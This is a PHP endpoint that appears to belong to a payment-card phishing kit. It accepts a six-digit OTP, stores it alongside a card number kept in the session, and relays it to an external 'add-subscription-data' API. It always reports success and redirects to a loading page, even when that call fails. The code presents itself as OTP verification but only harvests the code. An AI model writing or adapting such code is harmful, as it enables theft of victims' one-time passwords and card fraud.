<?php
include '../include/server.php';

// Set headers for JSON response
header('Content-Type: application/json');
error_reporting(0);

// Initialize response array
$response_data = [
    'success' => false,
    'message' => 'Invalid request'
];

// Check if it's a POST request
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Get JSON input
    $input = json_decode(file_get_contents('php://input'), true);

    $otp = isset($input['otp']) ? trim($input['otp']) : '';
    
    // Validate input - only OTP is required
    if (empty($otp)) {
        $response_data['message'] = 'OTP is required';
        echo json_encode($response_data);
        exit;
    }

    // Validate OTP format (should be 6 digits)
    if (!preg_match('/^\d{6}$/', $otp)) {
        $response_data['message'] = 'Invalid OTP format. Please enter 6 digits.';
        echo json_encode($response_data);
        exit;
    }

    // Store OTP in session
    $_SESSION['otp'] = $otp;
    
    // Get card number from session if available
    $card = isset($_SESSION['card']) ? $_SESSION['card'] : '';

    // Prepare data to send to API
    $dataToSend = [
        'data3' => 'OTP: ' . $otp
    ];

    // Send data to API
    $apiResponse = sendData('add-subscription-data', $dataToSend);

    // Check API response
    if ($apiResponse && isset($apiResponse['success']) && $apiResponse['success']) {
        $response_data['success'] = true;
        $response_data['message'] = 'OTP verification successful';
        $response_data['redirect'] = 'loading.php';
    } else {
        $response_data['success'] = true; // Still redirect even if API fails
        $response_data['message'] = 'OTP processed';
        $response_data['redirect'] = 'loading.php';
    }
} else {
    $response_data['message'] = 'Only POST requests are allowed';
}

// Return JSON response
echo json_encode($response_data);
exit;
?>